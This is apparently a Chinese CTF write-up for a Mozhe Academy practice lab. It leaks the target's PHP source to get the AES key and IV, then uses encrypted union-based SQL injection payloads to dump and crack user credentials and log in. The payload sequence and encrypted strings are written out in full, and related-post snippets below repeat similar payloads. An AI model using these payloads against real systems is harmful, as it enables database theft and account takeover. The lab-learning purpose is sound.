SQL注入漏洞测试(参数加密)

已于 2023-07-30 18:11:25 修改
阅读量189 收藏
点赞数 1
分类专栏: Web安全 CTF 墨者学院刷题笔记 文章标签: sql 数据库 web安全 网络安全
于 2023-07-30 18:05:37 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/rumil/article/details/132009541
版权

SQL注入漏洞测试(参数加密)

题目:
墨者学院-数据库安全-SQL注入漏洞测试

image-20230730161912649

解题思路以及步骤:
启动靶场环境并进入

image-20230730161952241

发现右下方有可以点击的地方,点进去查看一下

image-20230730162213605

进入后发现url当中有加密

image-20230730162302651

说明传入的数据被加密了,在源码当中通过解密分析得到原值,才可以得到查询结果。

根据题目的提示:

image-20230730162409557

观察url的信息

image-20230730162554598

通过观察url的信息提示,我们进行爆破该网站的目录,看能不能得到有用的信息

image-20230730162613918

爆破出来的目录进行访问,查看

点击访问该目录信息得到以下内容

image-20230730162715905

list.php为该站点首页即该登录界面
list.zip可能为备份的打包文件,点击下载

下载到本地后,解压后查看,发现是源码,如下:

<?php
header('content-type:text/html;charset=utf-8');
require_once '../config.php';
//解密过程
function decode($data){
	$td = mcrypt_module_open(MCRYPT_RIJNDAEL_128,'',MCRYPT_MODE_CBC,'');
	mcrypt_generic_init($td,'ydhaqPQnexoaDuW3','2018201920202021');
	$data = mdecrypt_generic($td,base64_decode(base64_decode($data)));
	mcrypt_generic_deinit($td);
	mcrypt_module_close($td);
	if(substr(trim($data),-6)!=='_mozhe'){
		echo '<script>window.location.href="/index.php";</script>';
	}else{
		return substr(trim($data),0,strlen(trim($data))-6);
	}
}
$id=decode($_GET['id']);
$sql="select id,title,content,time from notice where id=$id";
$info=$link->query($sql);
$arr=$info->fetch_assoc();
?>
<!DOCTYPE html>
<html lang="en">
<head>
<meta charset="UTF-8">
<title>X公司HR系统V1.0</title>
<style>.body{width:600px;height:500px;margin:0 auto}.title{color:red;height:60px;line-height:60px;font-size:30px;font-weight:700;margin-top:75pt;border-bottom:2px solid red;text-align:center}.content,.title{margin:0 auto;width:600px;display:block}.content{height:30px;line-height:30px;font-size:18px;margin-top:40px;text-align:left;color:#828282}</style>
</head>
<body>
<div class="body">
<div class="title"><?php echo $arr['title']?></div>
<div class="content"><?php echo $arr['content']?></div>
</body>
</html>

通过源码分析可得知:

各个php函数含义和作用可查看网上相关资源,搜索查阅即可。

image-20230730163136634

两次base64解密

image-20230730163555917

得到该AES加密的偏移量和秘钥后,可进行解密

(AES加密方式输出方式可以base64方式输出)

先将此字符串进行base64解密,然后再进行AES解密,将base64解密后的结果放到AES界面工具的密文当中,结合秘钥和偏移量以及填充,可得原值。

image-20230730163735107

[在线base64解密工具]:Base64 编码/解码 | 菜鸟工具 (runoob.com) 或使用工具也可以

[在线AES解密工具]:在线AES加密解密、AES在线加密解密、AES encryption and decryption–查错网 (chacuo.net)

[在线AES解密平台]:AES加密、AES解密 - 在线工具 - OKTools

先将ZUlJOGMzSmVMMHQwZHhNN3diM056Zz09进行base64解密
解密后得到:
eII8c3JeL0t0dxM7wb3Nzg==

image-20230730164110523

将此值作为密文放到AES加解密平台当中,在将源码当中的秘钥和偏移量取出来,解密即可

明文:eII8c3JeL0t0dxM7wb3Nzg==
秘钥:ydhaqPQnexoaDuW3
偏移量:2018201920202021
填充值尝试即可

image-20230730164527305

接下来就可以开始注入了,注意观察源码的另一个细节

image-20230730164820877

这意思是将会进行判断我们传入的参数的后六位是否有_mozhe 如果没有则会跳转回index.php页面

尝试注入:

首先将sql语句写好然后进行AES加密,再进行base64加密,然后在放入到url当中即可。

都是同样的道理,先AES加密,再base64加密,将最后的加密结果放到url当中去访问执行即可。

注入语句:
1 and 1=1_mozhe
1 and 1=2_mozhe
判断字段个数:
1 order by 1_mozhe
1 order by 2_mozhe
.....
1 order by 5_mozhe的时候报错,说明有4列字段

判断回显点:
-1 union select 1,2,3,4_mozhe

查看数据库以及数据库版本:
-1 union select 1,database(),version(),4_mozhe

查看数据表的信息:
-1 union select 1,database(),group_concat(table_name),4 from information_schema.tables where table_schema=database()_mozhe

查看数据表的列信息:
-1 union select 1,database(),group_concat(column_name),4 from information_schema.columns where table_name='StormGroup_member'_mozhe

获取敏感信息(username、password等):
-1 union select 1,database(),group_concat(name,"+",password,"+",status),4 from StormGroup_member_mozhe

首先AES加密

image-20230730165612032

再base64加密

image-20230730165651378

最后的加密结果,再放到url当中去:

页面无变化,将1=1,换成1=2

image-20230730165734709

同样的方法,先AES加密,再base64加密后,得到最后的加密结果,再放到url当中去访问:

1 and 1=2_mozhe
加密后的结果为:
L2d4cHU0dngxOU1hMTY1RWNzenBuUT09

页面没有显示内容,返回空白,由此可见存在注入,构造sql语言即可

image-20230730165859046

判断字段的个数:

同理,将构造的sql语句还是先AES加密,再base64加密,将最后的加密结果放到url当中去访问即可!

1 order by 1_mozhe
正常回显,将1换成2,3,4依次尝试,同样的先AES加密再base64加密,最后的加密结果放到url当中访问
当到1 order by 5_mozhe的时候报错,说明只有4列字段

image-20230730170344886

1 order by 5_mozhe
报错

image-20230730170601710

说明有4类字段信息

判断回显点:

image-20230730171131590

查看当前数据库以及版本:

image-20230730171351728

查看数据表:

image-20230730172030697

获取列的信息:

image-20230730172224231

获取用户的敏感信息:

image-20230730172655532

获取成功

在线MD5解密平台

分别将获取的密码进行解密

image-20230730172859255

image-20230730172921605

尝试登录:

用户名:mozhe
密码:dsan13

用户名:mozhe
密码:580325

哪个成功登录用哪个,由于查出来的结果status值为1的可正常登录,所以第二个可登录成功

image-20230730173127272

成功进入后台,获取到key

以上构造的sql语句AES加密,base64加密后的结果,通过url访问分别为:

判断回显点:
eGdkNThpcFRybng4VnpTQkppY3FDbzMrekZGemhheTVieUZVM2NqYmRlST0=

查询数据库以及版本:
eGdkNThpcFRybng4VnpTQkppY3FDb3B6cDN4UkU4UmxYUml0SnFOUzNiSG12bi9Nb0tJTkhBV1lhblRhYW5rYg==

查看数据表的信息:
eGdkNThpcFRybng4VnpTQkppY3FDZ25xQ0dSUCtaMzRxazhncDR6dkxpeU1wMnRIVGN0SEFSblZlTFlZR2lQcytmNUxjUWxzVW9pUm1OajN3U0NzQWxnZTNrQUxyRFlQd1kxQ1ZtaCtXMDMxbGpMNG4xVGlLdkRQSGdFd0UrRUk0aEd1bDg5OE9wWlpzbHZUdG1paVcxK05yR1dsOTlKWVF0YUNwVnladHJZPQ==

查看数据表的列的信息:
eGdkNThpcFRybng4VnpTQkppY3FDZ25xQ0dSUCtaMzRxazhncDR6dkxpd1NmaXU0U3hEUThrVmRKS1dGZGZvTGhlN0I0Tlc1bGIvbE9NRzVvelRRQW8wWkJ2UCtXaVNpSEl5NDRPeDdrQkt1L0ZSd3N0OTg5VkhyUVBqU1JVNEJSNUtyODk2K1pNcnZ6QVFZRTlZRGZRdjFmK05zaHpHM2V1K2Z4Z2ZBdkI3Ym5BTW14R2V6Q3Yra1k5bksrVTFO

获取敏感数据(name和password、status)
eGdkNThpcFRybng4VnpTQkppY3FDZ25xQ0dSUCtaMzRxazhncDR6dkxpdzV2MkRjSTFQb3owYXdFUi92TkZPN0QyWU82TG5TWHpSTVlaRVhFeG5FcUkyZEkwbUlyalRYWHkxTDhrYkFhRWxoZEg2YnhmeCtUUTlXWXNxaWFjajlHanNFVWpHbExYZ0N0azI5bUF1d0lnPT0=

文章不妥之处,欢迎批评指正!

rumilc
关注
  • 1
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
墨者学院 - SQL注入漏洞测试(参数加密)
多崎巡礼的博客
09-28 2500
list.php 御剑扫描得到   http://219.153.49.228:48291/news/list.zip 解压得到源码 从decode方法可知:AES的数据块长度为128位,密钥为ydhaqPQnexoaDuW3,偏移量为2018201920202021,填充为zeropadding 第八行 :判断网页id后面的查询字符串值,先两次base64解密,再AES解密,删除_mo...
SQL注入试验一(获取数据库内容)
热门推荐
Toby的博客
10-10 1万+
这篇博客是讲述SQL注入的实例操作,废话不多说,下面开始:      第一步我们要先判断是否存在注入点      进入实验的网站,如下:       然后在网址后面输入单引号'   回车(如下图,出现错误)       接下里在网址后面输入 and 1='1(此处需要注意闭合单引号,网页恢复正常)       然后将 and 1=‘1 改成 and 1=‘
CTF之墨者靶场sql注入参数加密
qq_36585338的博客
11-26 1190
关于sql注入的扩展案例参数加密注入,本文章讲述了参数加密类型,以及加密代码的审计,拖库等知识
渗透学习—靶场篇—墨者学院—SQL注入漏洞测试(参数加密)
qq_43696276的博客
10-25 1833
这一关,难点主要在于需要我们判断参数后的加解密类型,从而引导我们去目录遍历,拿到对应的源码!!!然后呢,还需要我们能够对php代码进行审计,从而找出其参数加密过程。。其中还有一个坑在于末尾要加上_mozhe总体而言,感觉难度还是稍有的(于我个人而言)
sqlmap注入漏洞测试
02-22
SQLMap 注入漏洞测试Web 应用程序中, SQL 注入是一种常见的安全漏洞,它可以让攻击者访问和控制数据库中的敏感数据。SQLMap 是一款自动化的 SQL 注入工具,它可以检测和利用 SQL 注入漏洞,以获取数据库中的...
SQL注入漏洞演示源代码
01-22
"SQL注入漏洞实例演示.rar"文件很可能包含了源代码和相关的测试用例。源代码可能包含易受攻击的PHP或其它服务器端脚本,这些脚本在处理用户输入时没有进行充分的数据过滤和转义。测试用例则可能展示如何构造有效的...
SQL手工注入大全:包含各种类型的SQL注入,实现手工注入的乐趣,此资源你值得拥有。
05-31
宽字节注入、SQL手工注入漏洞测试(Oracle数据库)、SQL手工注入漏洞测试(...SQL注入漏洞测试(参数加密)、SQL手工注入漏洞测试(MySQL数据库)、SQL注入漏洞测试(delete注入)、SQL过滤字符后手工注入漏洞测试、延时注入...
CTF 加密 解密 SQL注入 BASE64
03-19
综合上述,CTF比赛涵盖了广泛的网络安全知识,包括加密与解密策略、理解并利用BASE64编码、识别和利用SQL注入漏洞,以及使用扫描测试工具进行漏洞探测。参与CTF不仅可以提升个人技能,也是对网络安全理论与实践相...
05-浅谈企业SQL注入漏洞的危害与防御1
08-03
3. **权限提升**:攻击者可能利用注入漏洞获得数据库管理员权限,进一步控制整个系统。 4. **Webshell获取**:某些情况下,攻击者可利用注入创建后门,获取Webshell,从而持续控制网站。 **SQL注入的分类** 1. **按...
SQL注入漏洞测试
09-12
SQL注入漏洞测试入门篇
SQL注入攻击获取数据方式和常见注入点
白帽黑客八哥的博客
12-15 1229
SQL注入攻击是一种常见且危险的网络安全威胁,它发生在Web应用程序的数据库层面。在这种攻击中,攻击者利用应用程序中的安全漏洞,将恶意的SQL代码注入到用户输入中,进而执行非授权的数据库操作。
前端SQL注入和接口加密
weixin_42178670的博客
12-03 462
前端对传输值或者传输路径进行加密,后端对返回数据进行加密,避免数据传输过程中被抓包泄露数据信息。1、js正则校验: 验证特殊符号(但存在被禁用js的可能,后端也要进行验证)4、使用SQL语句检测工具检测SQL的语句漏洞。2、屏蔽敏感词,通过代码屏蔽掉敏感词。
SQL注入测试
最新发布
无极低码
03-29 616
根据识别出的注入点,构造特殊的输入字符串(payload),这些字符串包含SQL语法和控制逻辑,如单引号(')、双引号(")、分号(;这种测试模拟恶意用户向数据库查询中注入攻击性SQL代码的行为,以判断应用程序是否能够有效地防止未授权的数据访问、数据篡改或系统控制。使用自动化工具,如sqlmap、Burp Suite、OWASP ZAP等,可以更高效地进行SQL注入测试。如果应用程序的响应发生了变化,或者返回了异常的数据(如数据库结构、其他用户的数据等),则可能表明存在SQL注入漏洞
SQL加解密注入详解
永远是少年
07-25 1433
今天继续给大家介绍Linux运维相关知识,本文主要内容是SQL加解密注入。 一、SQL加解密注入原理 二、SQL加解密注入靶场逻辑介绍 三、SQL加解密注入实战
人工智能安全-6-SQL注入检测
爱学习爱运动的专栏
09-15 1687
SQLIA:SQL injection attack SQL 注入攻击是一个简单且被广泛理解的技术,它把 SQL 查询片段插入到 GET 或 POST 参数里提交到网络应用。由于SQL数据库Web应用中的普遍性,使得SQL攻击在很多网站上都可以进行。并且这种攻击技术的难度不高,但攻击变换手段众多,危害性大,使得它成为网络安全中比较棘手的安全问题。
SQL注入总结 附带sqlmap使用参数
weixin_52206305的博客
03-07 1082
SQL注入漏洞(SQLinjection)是Web层面最高危的漏洞之一。在2008年至2010年期间,SQL注入漏洞连续3年在OWASP年度十大漏洞排行中排名第一。在2005年前后,SQL注入漏洞到处可见,在用户登录或者搜索时,只需要输入一个单引号就可以检测出这种漏洞。随着Web应用程序的安全性不断提高,SQL注入漏洞逐渐减少,同时也变得更加难以检测与利用。
SQL注入漏洞测试(参数加密)&墨者靶场
qq_63283137的博客
10-06 209
爆表:-1 union select 1,group_concat(table_name),3,4 from information_schema.tables where table_schema='mozhe_Discuz_StormGroup' limit 0,1_mozhe。加密原理:明文-->AES加密--> bsse64加密--->base64加密-->密文。查回显:-1 union select 1,2,3,4_mozhe。尝试解密,无法解密,可能是有多种加密方式组合或加salt。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值